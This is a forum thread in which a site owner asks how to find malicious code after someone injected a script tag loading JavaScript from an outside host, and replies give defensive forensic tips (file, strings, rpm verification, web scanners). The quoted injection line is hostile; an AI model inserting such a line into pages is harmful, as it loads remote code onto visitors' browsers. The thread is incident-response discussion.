How to detect malicious code on linux

adumith · 02-28-2014, 07:19 AM

Greetings,

This time I want to ask you a special support; since yesterday I have had problems with the content of our system.

Investigating the situation we've found that someone have included in our maliciosus code contained this script <script src="http://csjq.hol.es/xs.js"/script> this one was Built with a tool called makeself.

Reading about this tool we found that makeself is a small shell script that generates a self-extractable compressed TAR archive from a directory. The resulting file appears as a shell script, and can be launched as is. The archive will then uncompress itself to a temporary directory and an arbitrary command will be executed (for example, an installation script).

So, can any body help me to identify what are the scripts or file that this tools generated?

Thanks in advance.

linosaurusroot · 02-28-2014, 09:55 AM

You could look for files with a ctime later than about the time of the hostile activity.

You could extract a tarfile once you have found it.

On a disposable system a trick for capturing self-extracting content is to have an append-only filesystem that you extract on and the code will fail to delete its traces. You could rig this using NFS or a kernel with unlink() not implemented. Directory attributes also work provided the extraction uses the directory in question.

Habitual · 02-28-2014, 10:57 AM

Quote:

Originally Posted by adumith

Now about the entire suspect code|line?
That is a very small piece of code and I'd think there would be more to it.

metaschima · 02-28-2014, 11:36 AM

Some things you can try:

1) Use 'file' command to see if it is a binary file.
2) Use

Code:

grep '#!/bin/*.sh'

to see if it is a script, and then use 7zip to try and extract the file, and if it succeeds then it does contain an archive

Code:

if 7z t new.sh ; then echo "File contains archive"; fi

byau · 03-03-2014, 06:43 PM

Use "file" to find out what kind of file it is. If ascii text or script you should be able to view it.

You can use "strings" to view any type of characters it can find, even in a binary.

Also, you can find out if any system files have been compromised (usually /bin or /usr/bin) by running rpm -qV. V = verify. It will tell you what files have been changed since original package installation. To view everything

rpm -qaV

This will take awhile

And of course you'll need someone linux-proficient to go through the output and know which files are supposed to have been changed since installation (e.g. /etc/passwd).

And you'll have to also then look in those files and see if changes are expected or not (who knows the proper users in /etc/passwd? )

But if it shows you for example that /bin/ls has changed since install, that is fishy

sundialsvcs · 03-04-2014, 08:00 AM

Nevermind what it is ... how did it get there?

If someone was capable of modifying your delivered web-page at all, then some part of your system has been compromised. (Or else you have a rogue employee ...)

Habitual · 03-04-2014, 01:06 PM

Quote:

Originally Posted by sundialsvcs

how did it get there?

So much time wasted on what's it is or what's in it...who cares? All I'd need to know is I, or my system did not put it there and that makes it immediately suspect.

This is the task you SHOULD BE FOCUSED ON.

http://www.unmaskparasites.com/secur...www.domain.com
Pay direct attention to "External References"

sitecheck.sucuri.net/results/www.domain.com
http://evuln.com/tools/malware-scanner/www.domian.com
and
http://wepawet.cs.ucsb.edu/index.php (URL: field)

You may have (and I suspect if there's one, there's 1++)